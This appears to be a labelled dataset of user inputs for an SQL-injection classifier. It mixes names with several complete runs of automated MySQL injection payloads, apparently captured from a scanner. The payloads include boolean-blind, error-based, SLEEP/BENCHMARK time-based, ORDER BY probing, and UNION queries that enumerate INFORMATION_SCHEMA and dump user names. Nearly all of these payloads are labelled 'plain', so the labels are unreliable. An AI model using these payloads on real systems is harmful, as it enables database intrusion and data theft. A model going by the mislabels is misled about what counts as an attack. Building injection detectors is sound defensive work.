
sneha plain
sneha 1=1 plain
sneha plain
sneha plain
sneha plain
sneha plain
sneha plain
sneha plain
sneha 1=1 plain
sneha plain
sneha plain
sneha plain
sneha plain
sneha 1=1 sqli
sneha plain
sneha 1=1 sqli
sneha 1=1 sqli
sneha plain
harsh plain
1 plain
1 plain
1 plain
6394 plain
1.)((,,"(') plain
1'rnhLMp<'">NlDyYA plain
1) AND 7260=4768 AND (3364=3364 plain
1) AND 3370=3370 AND (7242=7242 plain
1 AND 3947=5602 plain
1 AND 3370=3370 plain
1 AND 7934=7922-- dxik plain
1 AND 3370=3370-- hiEn plain
1') AND 4823=3910 AND ('yvzr'='yvzr plain
1') AND 3370=3370 AND ('mTBW'='mTBW plain
1' AND 1872=4337 AND 'jmfb'='jmfb plain
1' AND 3370=3370 AND 'gIGi'='gIGi plain
(SELECT (CASE WHEN (1443=2205) THEN 1 ELSE (SELECT 2205 UNION SELECT 2696) END)) plain
(SELECT (CASE WHEN (9256=9256) THEN 1 ELSE (SELECT 9635 UNION SELECT 1414) END)) plain
(SELECT CONCAT(CONCAT(0x71707a6b71,(CASE WHEN (5040=5040) THEN 0x31 ELSE 0x30 END)),0x7162627a71)) plain
1) AND 9909=9535# plain
1) AND 8165=8165# plain
1)) AND 2632=2345# plain
1)) AND 8165=8165# plain
1))) AND 5804=2348# plain
1))) AND 8165=8165# plain
1 AND 2782=6809# plain
1 AND 8165=8165# plain
1)) AS dxOk WHERE 9368=9368 AND 2445=7020# plain
1)) AS DbRQ WHERE 7767=7767 AND 8165=8165# plain
1) AS exgG WHERE 2705=2705 AND 4381=6319# plain
1) AS gmFB WHERE 5662=5662 AND 8165=8165# plain
1` WHERE 2149=2149 AND 3765=8280# plain
1` WHERE 1310=1310 AND 8165=8165# plain
1`) WHERE 2737=2737 AND 5807=7437# plain
1`) WHERE 8714=8714 AND 8165=8165# plain
1') AND 1982=5403# plain
1') AND 8165=8165# plain
1' AND 4176=4649# plain
1' AND 8165=8165# plain
1" AND 6074=4920# plain
1" AND 8165=8165# plain
1')) AND 2008=7562# plain
1')) AND 8165=8165# plain
1'))) AND 7542=9400# plain
1'))) AND 8165=8165# plain
1%' AND 7166=9407# plain
1%' AND 8165=8165# plain
1") AND 3733=3472# plain
1") AND 8165=8165# plain
1")) AND 8173=4758# plain
1")) AND 8165=8165# plain
1"))) AND 3688=2759# plain
1"))) AND 8165=8165# plain
1')) AS TaxU WHERE 8500=8500 AND 3841=3270# plain
1')) AS zAiN WHERE 6766=6766 AND 8165=8165# plain
1")) AS oMze WHERE 4563=4563 AND 2126=9899# plain
1")) AS JkKa WHERE 3146=3146 AND 8165=8165# plain
1') AS DUWC WHERE 2542=2542 AND 2453=2025# plain
1') AS qLyS WHERE 5568=5568 AND 8165=8165# plain
1") AS GfEW WHERE 3606=3606 AND 8745=7313# plain
1") AS ilas WHERE 4172=4172 AND 8165=8165# plain
1' IN BOOLEAN MODE) AND 4283=1190# plain
1' IN BOOLEAN MODE) AND 8165=8165# plain
-6804 plain
-4279) OR 8134=2266# plain
-9566) OR 6903=6903# plain
-7019)) OR 4543=2134# plain
-6744)) OR 6903=6903# plain
-2538))) OR 2518=8943# plain
-7721))) OR 6903=6903# plain
-2458 OR 9739=2252# plain
-1119 OR 6903=6903# plain
-8826)) AS iLZT WHERE 9986=9986 OR 8599=3779# plain
-3406)) AS tYRK WHERE 8813=8813 OR 6903=6903# plain
-1953) AS KjAK WHERE 8831=8831 OR 3668=4428# plain
-4671) AS IKur WHERE 3238=3238 OR 6903=6903# plain
-4417') OR 8488=4668# plain
-9784') OR 6903=6903# plain
-6168' OR 9489=7754# plain
-8229' OR 6903=6903# plain
-9707' OR 7694=7676# plain
-1932' RHVOKBgbDO# plain
1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71707a6b71,(SELECT (ELT(4777=4777,1))),0x7162627a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- XaKq plain
1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71707a6b71,(SELECT (ELT(1553=1553,1))),0x7162627a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- jRmR plain
1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71707a6b71,(SELECT (ELT(2301=2301,1))),0x7162627a71,0x78))x))-- NiUu plain
1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71707a6b71,(SELECT (ELT(1721=1721,1))),0x7162627a71,0x78))x))-- lOQD plain
1' AND GTID_SUBSET(CONCAT(0x71707a6b71,(SELECT (ELT(3931=3931,1))),0x7162627a71),3931)-- VVYm plain
1' OR GTID_SUBSET(CONCAT(0x71707a6b71,(SELECT (ELT(4918=4918,1))),0x7162627a71),4918)-- oDmm plain
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71707a6b71,(SELECT (ELT(2925=2925,1))),0x7162627a71)) USING utf8)))-- pjSP plain
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71707a6b71,(SELECT (ELT(4352=4352,1))),0x7162627a71)) USING utf8)))-- wGeT plain
1' AND (SELECT 7080 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(7080=7080,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- GCHH plain
(SELECT CONCAT(0x71707a6b71,(ELT(7845=7845,1)),0x7162627a71)) plain
1';SELECT SLEEP(5)# plain
1';SELECT SLEEP(5)-- eArY plain
1';(SELECT * FROM (SELECT(SLEEP(5)))ywfX)# plain
1';(SELECT * FROM (SELECT(SLEEP(5)))tTXt)-- ARyV plain
1';SELECT BENCHMARK(5000000,MD5(0x774b5a57))# plain
1';SELECT BENCHMARK(5000000,MD5(0x5a7a7a63))-- KoWK plain
1' AND (SELECT 1885 FROM (SELECT(SLEEP(5)))BrYu)-- gpis plain
1' AND (SELECT 1885 FROM (SELECT(SLEEP(0)))BrYu)-- gpis plain
1' AND (SELECT 1885 FROM (SELECT(SLEEP(5)))BrYu)-- gpis plain
1' ORDER BY 1# plain
1' ORDER BY 5328# plain
1' ORDER BY 10# plain
1' ORDER BY 6# plain
1' ORDER BY 4# plain
1' ORDER BY 5# plain
1' UNION ALL SELECT NULL,CONCAT(0x71707a6b71,0x5062554368436861636170784f6c75716662787567794145625447435a4b476174514a4863477a4f,0x7162627a71),NULL,NULL# plain
1' UNION ALL SELECT NULL,CONCAT(0x71707a6b71,0x5062554368436861636170784f6c75716662787567794145625447435a4b476174514a4863477a4f,0x7162627a71),NULL,NULL UNION ALL SELECT NULL,CONCAT(0x71707a6b71,0x6a6c4d476b696e44704a484c656744417573576e4d41707975554c4b5a6969745057476d4c455945,0x7162627a71),NULL,NULL# plain
1' UNION ALL SELECT NULL,CONCAT(0x71707a6b71,0x5062554368436861636170784f6c75716662787567794145625447435a4b476174514a4863477a4f,0x7162627a71),NULL,NULL FROM (SELECT 0 AS rUmL UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS WPxf# plain
1' UNION ALL SELECT NULL,CONCAT(0x71707a6b71,(CASE WHEN (6962=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6962) THEN 1 ELSE 0 END),0x7162627a71),NULL,NULL# plain
1' UNION ALL SELECT NULL,CONCAT(0x71707a6b71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7162627a71),NULL,NULL# plain
1' UNION ALL SELECT NULL,CONCAT(0x71707a6b71,JSON_ARRAYAGG(CONCAT_WS(0x646770626e67,schema_name)),0x7162627a71),NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA# plain
1' UNION ALL SELECT NULL,CONCAT(0x71707a6b71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7162627a71),NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA# plain
1 plain
1' UNION ALL SELECT NULL,CONCAT(0x71707a6b71,JSON_ARRAYAGG(CONCAT_WS(0x646770626e67,schema_name)),0x7162627a71),NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA# sqli
harsh plain
harsh 1=1 sqli
select *user plain
select * from user; plain
avii plain
select * from user where name = 'sneha'; plain
select * from user where name = 'sneha' plain
select * from user; plain
SELECT * FROM `user` WHERE 1 plain
sneha = sneha sqli plain
sneha AND 123=123456 AND sj=sj  sqli
sneha plain
sneha 1=1 sqli
1 plain
1 plain
1 plain
9793 plain
1.(,".)..', plain
1'ONNbkl<'">yGOELS plain
1) AND 8372=9632 AND (7608=7608 sqli
1 plain
1 plain
8848 plain
1"'.,.,,... plain
1'ZRfMpg<'">jMSpRg plain
1) AND 2191=9046 AND (6703=6703 plain
1) AND 4854=4854 AND (9567=9567 plain
1 AND 2462=3385 plain
1 AND 4854=4854 plain
1 AND 5193=5030-- VBZg plain
1 AND 4854=4854-- oRVu plain
1') AND 8299=6155 AND ('PoSl'='PoSl plain
1') AND 4854=4854 AND ('nMYm'='nMYm plain
1' AND 4467=1819 AND 'KUGT'='KUGT plain
1' AND 4854=4854 AND 'HTAK'='HTAK plain
(SELECT (CASE WHEN (4551=1024) THEN 1 ELSE (SELECT 1024 UNION SELECT 9152) END)) plain
(SELECT (CASE WHEN (4365=4365) THEN 1 ELSE (SELECT 4091 UNION SELECT 1044) END)) plain
(SELECT CONCAT(CONCAT(0x71626b6b71,(CASE WHEN (4132=4132) THEN 0x31 ELSE 0x30 END)),0x717a787171)) plain
1) AND 8369=7172# plain
1) AND 8751=8751# plain
1)) AND 6543=7525# plain
1)) AND 8751=8751# plain
1))) AND 7233=6372# plain
1))) AND 8751=8751# plain
1 AND 3881=3406# plain
1 AND 8751=8751# plain
1)) AS DhqI WHERE 1360=1360 AND 2517=6430# plain
1)) AS zevG WHERE 4872=4872 AND 8751=8751# plain
1) AS hbwZ WHERE 7622=7622 AND 1288=1300# plain
1) AS qrEI WHERE 3125=3125 AND 8751=8751# plain
1` WHERE 1984=1984 AND 7340=3068# plain
1` WHERE 8786=8786 AND 8751=8751# plain
1`) WHERE 2800=2800 AND 6777=5090# plain
1`) WHERE 1241=1241 AND 8751=8751# plain
1') AND 6980=4089# plain
1') AND 8751=8751# plain
1' AND 1311=9781# plain
1' AND 8751=8751# plain
1" AND 8559=2327# plain
1" AND 8751=8751# plain
1')) AND 4600=5306# plain
1')) AND 8751=8751# plain
1'))) AND 6969=9596# plain
1'))) AND 8751=8751# plain
1%' AND 7952=9455# plain
1%' AND 8751=8751# plain
1") AND 4452=3189# plain
1") AND 8751=8751# plain
1")) AND 8063=6595# plain
1")) AND 8751=8751# plain
1"))) AND 5964=3245# plain
1"))) AND 8751=8751# plain
1')) AS RfdP WHERE 3908=3908 AND 6298=8017# plain
1')) AS rDow WHERE 7963=7963 AND 8751=8751# plain
1")) AS IwTS WHERE 8293=8293 AND 9457=8768# plain
1")) AS hzzj WHERE 1850=1850 AND 8751=8751# plain
1') AS WoIt WHERE 3207=3207 AND 8155=9061# plain
1') AS qMSD WHERE 1045=1045 AND 8751=8751# plain
1") AS kekL WHERE 1119=1119 AND 1940=8318# plain
Vanshit plain
Vanshit plain
Abhinav plain
Shivam plain
Shivam plain
abhinav plain
abhi plain
Vanshit plain
Vanshit plain
Vanshit plain
abhinav plain
abhinav plain
abhinav plain
Vanshit plain
Vanshit plain
Vanshit plain
Vanshit plain
Vanshit plain
Vanshit plain
shivam plain
Vanshit || 1==1 plain
Vanshit || Abhinva plain
Vanshit || Abhinav plain
Vanshit or abhinav plain
vansh plain
vanshit  plain
vanshit  plain
1 plain
1 plain
1 plain
8066 plain
1.."'(),()) plain
1'fTwwhB<'">bhpkdd plain
1) AND 3324=5684 AND (8730=8730 plain
1) AND 6594=6594 AND (8294=8294 plain
1 AND 2594=7981 plain
1 AND 6594=6594 plain
1 AND 2234=3578-- uxFB plain
1 AND 6594=6594-- PUls plain
1') AND 5857=4794 AND ('kKgB'='kKgB plain
1') AND 6594=6594 AND ('ylSE'='ylSE plain
1' AND 6622=2578 AND 'dWbE'='dWbE plain
1' AND 6594=6594 AND 'kKVG'='kKVG plain
(SELECT (CASE WHEN (9075=8439) THEN 1 ELSE (SELECT 8439 UNION SELECT 9702) END)) plain
(SELECT (CASE WHEN (2471=2471) THEN 1 ELSE (SELECT 3225 UNION SELECT 7758) END)) plain
(SELECT CONCAT(CONCAT(0x71786a7a71,(CASE WHEN (9565=9565) THEN 0x31 ELSE 0x30 END)),0x717a787071)) plain
1) AND 9148=8720# plain
1) AND 9767=9767# plain
1)) AND 5140=9971# plain
1)) AND 9767=9767# plain
1))) AND 1708=1496# plain
1))) AND 9767=9767# plain
1 AND 9464=9061# plain
1 AND 9767=9767# plain
1)) AS uPLl WHERE 9763=9763 AND 5177=7425# plain
1)) AS EXQh WHERE 7690=7690 AND 9767=9767# plain
1) AS RdYF WHERE 8495=8495 AND 4288=9028# plain
1) AS qKso WHERE 3478=3478 AND 9767=9767# plain
1` WHERE 2366=2366 AND 7360=4958# plain
1` WHERE 2877=2877 AND 9767=9767# plain
1`) WHERE 2920=2920 AND 3952=7086# plain
1`) WHERE 9086=9086 AND 9767=9767# plain
1') AND 1165=8394# plain
1') AND 9767=9767# plain
1' AND 8446=4084# plain
1' AND 9767=9767# plain
1" AND 8844=9876# plain
1" AND 9767=9767# plain
1')) AND 7593=1916# plain
1')) AND 9767=9767# plain
1'))) AND 3592=9072# plain
1'))) AND 9767=9767# plain
1%' AND 5724=3835# plain
1%' AND 9767=9767# plain
1") AND 5468=5493# plain
1") AND 9767=9767# plain
1")) AND 5047=3334# plain
1")) AND 9767=9767# plain
1"))) AND 6410=7837# plain
1"))) AND 9767=9767# plain
1')) AS nLJi WHERE 1121=1121 AND 6909=2755# plain
1')) AS OVcI WHERE 5426=5426 AND 9767=9767# plain
1")) AS EKER WHERE 5038=5038 AND 9087=4969# plain
1")) AS ZDxb WHERE 6441=6441 AND 9767=9767# plain
1') AS grJv WHERE 6597=6597 AND 3145=8669# plain
1') AS GFEf WHERE 2157=2157 AND 9767=9767# plain
1") AS GEzQ WHERE 9547=9547 AND 5668=6567# plain
1") AS tlyG WHERE 2240=2240 AND 9767=9767# plain
1' IN BOOLEAN MODE) AND 6436=5627# plain
1' IN BOOLEAN MODE) AND 9767=9767# plain
-1551 plain
-4717) OR 8630=5686# plain
-7237) OR 2229=2229# plain
-5161)) OR 5178=8029# plain
-6833)) OR 2229=2229# plain
-4338))) OR 9220=2095# plain
-5017))) OR 2229=2229# plain
-5074 OR 8156=4916# plain
-4876 OR 2229=2229# plain
-7403)) AS dRTc WHERE 4043=4043 OR 9406=2974# plain
-5196)) AS pall WHERE 8201=8201 OR 2229=2229# plain
-6205) AS dVBu WHERE 8959=8959 OR 3838=1359# plain
-2115) AS MTEN WHERE 8087=8087 OR 2229=2229# plain
-9991') OR 4551=3917# plain
-9717') OR 2229=2229# plain
-7613' OR 7890=3626# plain
-8543' OR 2229=2229# plain
-5351' OR 1228=3909# plain
-5860' FRcCAHYNKL# plain
1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7a71,(SELECT (ELT(4725=4725,1))),0x717a787071,0x78))s), 8446744073709551610, 8446744073709551610)))-- lmoy plain
1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7a71,(SELECT (ELT(8603=8603,1))),0x717a787071,0x78))s), 8446744073709551610, 8446744073709551610)))-- Jely plain
1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7a71,(SELECT (ELT(1034=1034,1))),0x717a787071,0x78))x))-- STjB plain
1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7a71,(SELECT (ELT(2589=2589,1))),0x717a787071,0x78))x))-- ciSy plain
1' AND GTID_SUBSET(CONCAT(0x71786a7a71,(SELECT (ELT(9496=9496,1))),0x717a787071),9496)-- gPNU plain
1' OR GTID_SUBSET(CONCAT(0x71786a7a71,(SELECT (ELT(8638=8638,1))),0x717a787071),8638)-- TnZi plain
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7a71,(SELECT (ELT(4678=4678,1))),0x717a787071)) USING utf8)))-- Vapb plain
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7a71,(SELECT (ELT(5205=5205,1))),0x717a787071)) USING utf8)))-- qoyW plain
1' AND (SELECT 1481 FROM(SELECT COUNT(*),CONCAT(0x71786a7a71,(SELECT (ELT(1481=1481,1))),0x717a787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RNCS plain
(SELECT CONCAT(0x71786a7a71,(ELT(9966=9966,1)),0x717a787071)) plain
1';SELECT SLEEP(5)# plain
1';SELECT SLEEP(5)-- QTSz plain
1';(SELECT * FROM (SELECT(SLEEP(5)))sFbj)# plain
1';(SELECT * FROM (SELECT(SLEEP(5)))Fqcv)-- YMCB plain
1';SELECT BENCHMARK(5000000,MD5(0x4e4b6848))# plain
1';SELECT BENCHMARK(5000000,MD5(0x6e56486c))-- JwOe plain
1' AND (SELECT 7679 FROM (SELECT(SLEEP(5)))Yzmf)-- BHUN plain
1' AND (SELECT 7679 FROM (SELECT(SLEEP(0)))Yzmf)-- BHUN plain
1' AND (SELECT 7679 FROM (SELECT(SLEEP(5)))Yzmf)-- BHUN plain
1' ORDER BY 1# plain
1' ORDER BY 3458# plain
1' ORDER BY 10# plain
1' ORDER BY 6# plain
1' ORDER BY 4# plain
1' ORDER BY 5# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x755465785255554a584b424653574b5851714e48766d6a6a494b4e4e6b6665716c6a6c79576c636d,0x717a787071),NULL,NULL# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x755465785255554a584b424653574b5851714e48766d6a6a494b4e4e6b6665716c6a6c79576c636d,0x717a787071),NULL,NULL UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x7050556e46705965444152624e6e686d44577149634c5064617a637156687968684e785972595572,0x717a787071),NULL,NULL# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x755465785255554a584b424653574b5851714e48766d6a6a494b4e4e6b6665716c6a6c79576c636d,0x717a787071),NULL,NULL FROM (SELECT 0 AS dkNd UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS HXAB# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,(CASE WHEN (8199=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8199) THEN 1 ELSE 0 END),0x717a787071),NULL,NULL# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a787071),NULL,NULL# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,JSON_ARRAYAGG(CONCAT_WS(0x6d6b727a7371,schema_name)),0x717a787071),NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a787071),NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA# plain
1 plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,JSON_ARRAYAGG(CONCAT_WS(0x6d6b727a7371,table_name)),0x717a787071),NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73716c69)# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,IFNULL(CAST(table_name AS NCHAR),0x20),0x717a787071),NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73716c69)# plain
1 plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,JSON_ARRAYAGG(CONCAT_WS(0x6d6b727a7371,column_name,column_type)),0x717a787071),NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x75736572 AND table_schema=0x73716c69# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,IFNULL(CAST(column_name AS NCHAR),0x20),0x6d6b727a7371,IFNULL(CAST(column_type AS NCHAR),0x20),0x717a787071),NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x75736572 AND table_schema=0x73716c69# plain
1 plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,JSON_ARRAYAGG(CONCAT_WS(0x6d6b727a7371,name)),0x717a787071),NULL,NULL FROM sqli.`user` ORDER BY name# plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,IFNULL(CAST(name AS NCHAR),0x20),0x717a787071),NULL,NULL FROM sqli.`user` ORDER BY name# plain
Vanshit plain
Vanshit plain
Vanshit plain
1 plain
1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,JSON_ARRAYAGG(CONCAT_WS(0x6d6b727a7371,name)),0x717a787071),NULL,NULL FROM sqli.`user` ORDER BY name# plain
Vanshit plain
1 plain
1 plain
1 plain
1 plain
1 plain
1 plain
1 plain
7636 plain
1 plain
1.."(()',.. plain
4495 plain
1'pGBpOp<'">pLzWJo plain
1(,,.'(",., plain
1 plain
1 plain
5857 plain
1..,((,"(', plain
1'Rxgotp<'">PaiOws plain
1) AND 9987=3719 AND (5513=5513 plain
1) AND 3343=3343 AND (8407=8407 plain
1 AND 5274=4308 plain
1 AND 3343=3343 plain
1 AND 9832=3236-- SdkZ plain
1 AND 3343=3343-- zBDl plain
1') AND 9569=2905 AND ('vPCT'='vPCT plain
1') AND 3343=3343 AND ('sQGO'='sQGO plain
1' AND 1826=4941 AND 'zfkK'='zfkK plain
1' AND 3343=3343 AND 'fcEZ'='fcEZ plain
(SELECT (CASE WHEN (7281=8731) THEN 1 ELSE (SELECT 8731 UNION SELECT 7116) END)) plain
(SELECT (CASE WHEN (2965=2965) THEN 1 ELSE (SELECT 6710 UNION SELECT 8823) END)) plain
(SELECT CONCAT(CONCAT(0x7170766a71,(CASE WHEN (4785=4785) THEN 0x31 ELSE 0x30 END)),0x717a766271)) plain
1) AND 5769=9016# plain
1) AND 8878=8878# plain
1)) AND 3221=9510# plain
1)) AND 8878=8878# plain
1))) AND 7782=2815# plain
1))) AND 8878=8878# plain
1 AND 4942=5654# plain
1 AND 8878=8878# plain
1)) AS UyRf WHERE 8297=8297 AND 7536=2492# plain
1)) AS ZlqM WHERE 8472=8472 AND 8878=8878# plain
1) AS WniN WHERE 2369=2369 AND 5585=1407# plain
1) AS Wwmn WHERE 9715=9715 AND 8878=8878# plain
1` WHERE 3506=3506 AND 8418=1809# plain
1` WHERE 2658=2658 AND 8878=8878# plain
1`) WHERE 8038=8038 AND 1787=8123# plain
1`) WHERE 2720=2720 AND 8878=8878# plain
1') AND 6082=4693# plain
1') AND 8878=8878# plain
1' AND 5639=5560# plain
1' AND 8878=8878# plain
1" AND 2997=5412# plain
1" AND 8878=8878# plain
1')) AND 1512=6813# plain
1')) AND 8878=8878# plain
1'))) AND 2322=9554# plain
1'))) AND 8878=8878# plain
1%' AND 7805=7653# plain
1%' AND 8878=8878# plain
1") AND 2087=1227# plain
1") AND 8878=8878# plain
1")) AND 6977=8740# plain
1")) AND 8878=8878# plain
1"))) AND 7002=5029# plain
1"))) AND 8878=8878# plain
1')) AS RpOK WHERE 7909=7909 AND 7150=1189# plain
1')) AS oxbc WHERE 7156=7156 AND 8878=8878# plain
1")) AS EVfg WHERE 8763=8763 AND 2537=9222# plain
1")) AS UohM WHERE 4487=4487 AND 8878=8878# plain
1') AS HGsZ WHERE 2903=2903 AND 5287=6233# plain
1') AS kbhh WHERE 3730=3730 AND 8878=8878# plain
1") AS WQaD WHERE 4549=4549 AND 3090=5154# plain
1") AS kyJy WHERE 4099=4099 AND 8878=8878# plain
1' IN BOOLEAN MODE) AND 5110=9051# plain
1' IN BOOLEAN MODE) AND 8878=8878# plain
-2020 plain
-2079) OR 9469=6605# plain
-8174) OR 7404=7404# plain
-5442)) OR 8090=6636# plain
-1152)) OR 7404=7404# plain
-9127))) OR 9617=7561# plain
-8943))) OR 7404=7404# plain
-8941 OR 7521=8012# plain
-5175 OR 7404=7404# plain
-1006)) AS FvOa WHERE 7080=7080 OR 5850=5510# plain
-2146)) AS IZXy WHERE 7278=7278 OR 7404=7404# plain
-2484) AS FoZB WHERE 6443=6443 OR 6076=9787# plain
-5971) AS sNBs WHERE 8571=8571 OR 7404=7404# plain
-2247') OR 4499=9883# plain
-2122') OR 7404=7404# plain
-2801' OR 5373=2714# plain
-1144' OR 7404=7404# plain
-3045' OR 8287=7210# plain
-4089' CMWSUASGKI# plain
1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170766a71,(SELECT (ELT(2262=2262,1))),0x717a766271,0x78))s), 8446744073709551610, 8446744073709551610)))-- HsEd plain
1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170766a71,(SELECT (ELT(4508=4508,1))),0x717a766271,0x78))s), 8446744073709551610, 8446744073709551610)))-- LcyI plain
1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7170766a71,(SELECT (ELT(4232=4232,1))),0x717a766271,0x78))x))-- gSBQ plain
1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7170766a71,(SELECT (ELT(8231=8231,1))),0x717a766271,0x78))x))-- HUie plain
1' AND GTID_SUBSET(CONCAT(0x7170766a71,(SELECT (ELT(2022=2022,1))),0x717a766271),2022)-- dcOb plain
1' OR GTID_SUBSET(CONCAT(0x7170766a71,(SELECT (ELT(3743=3743,1))),0x717a766271),3743)-- PIgA plain
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7170766a71,(SELECT (ELT(3956=3956,1))),0x717a766271)) USING utf8)))-- mLgD plain
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7170766a71,(SELECT (ELT(2209=2209,1))),0x717a766271)) USING utf8)))-- dzXH plain
1' AND (SELECT 1088 FROM(SELECT COUNT(*),CONCAT(0x7170766a71,(SELECT (ELT(1088=1088,1))),0x717a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SzaH plain
(SELECT CONCAT(0x7170766a71,(ELT(4105=4105,1)),0x717a766271)) plain
1';SELECT SLEEP(5)# plain
1';SELECT SLEEP(5)-- Owic plain
1';(SELECT * FROM (SELECT(SLEEP(5)))iobV)# plain
1';(SELECT * FROM (SELECT(SLEEP(5)))OZnj)-- IOtJ plain
1';SELECT BENCHMARK(5000000,MD5(0x557a4374))# plain
1';SELECT BENCHMARK(5000000,MD5(0x73556247))-- tpdn plain
1' AND (SELECT 2400 FROM (SELECT(SLEEP(5)))AbHw)-- SBCq plain
1' AND (SELECT 2400 FROM (SELECT(SLEEP(0)))AbHw)-- SBCq plain
1' AND (SELECT 2400 FROM (SELECT(SLEEP(5)))AbHw)-- SBCq plain
1' ORDER BY 1# plain
1' ORDER BY 2229# plain
1' ORDER BY 10# plain
1' ORDER BY 6# plain
1' ORDER BY 4# plain
1' ORDER BY 5# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,0x5867647a45656c4b576d426169765275554a5550637558694e505874644468414568767070614542,0x717a766271),NULL,NULL,NULL# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,0x5867647a45656c4b576d426169765275554a5550637558694e505874644468414568767070614542,0x717a766271),NULL,NULL,NULL UNION ALL SELECT CONCAT(0x7170766a71,0x6a457073624c6d6650504759484f766c434454714a454f53557376665544665a4f4e4a576c6d6c43,0x717a766271),NULL,NULL,NULL# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,0x5867647a45656c4b576d426169765275554a5550637558694e505874644468414568767070614542,0x717a766271),NULL,NULL,NULL FROM (SELECT 0 AS AQkC UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS abQG# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,(CASE WHEN (2202=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2202) THEN 1 ELSE 0 END),0x717a766271),NULL,NULL,NULL# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a766271),NULL,NULL,NULL# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,JSON_ARRAYAGG(CONCAT_WS(0x6169626d6e6f,schema_name)),0x717a766271),NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a766271),NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA# plain
1 plain
1' UNION ALL SELECT CONCAT(0x7170766a71,JSON_ARRAYAGG(CONCAT_WS(0x6169626d6e6f,table_name)),0x717a766271),NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73716c69)# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,IFNULL(CAST(table_name AS NCHAR),0x20),0x717a766271),NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73716c69)# plain
1 plain
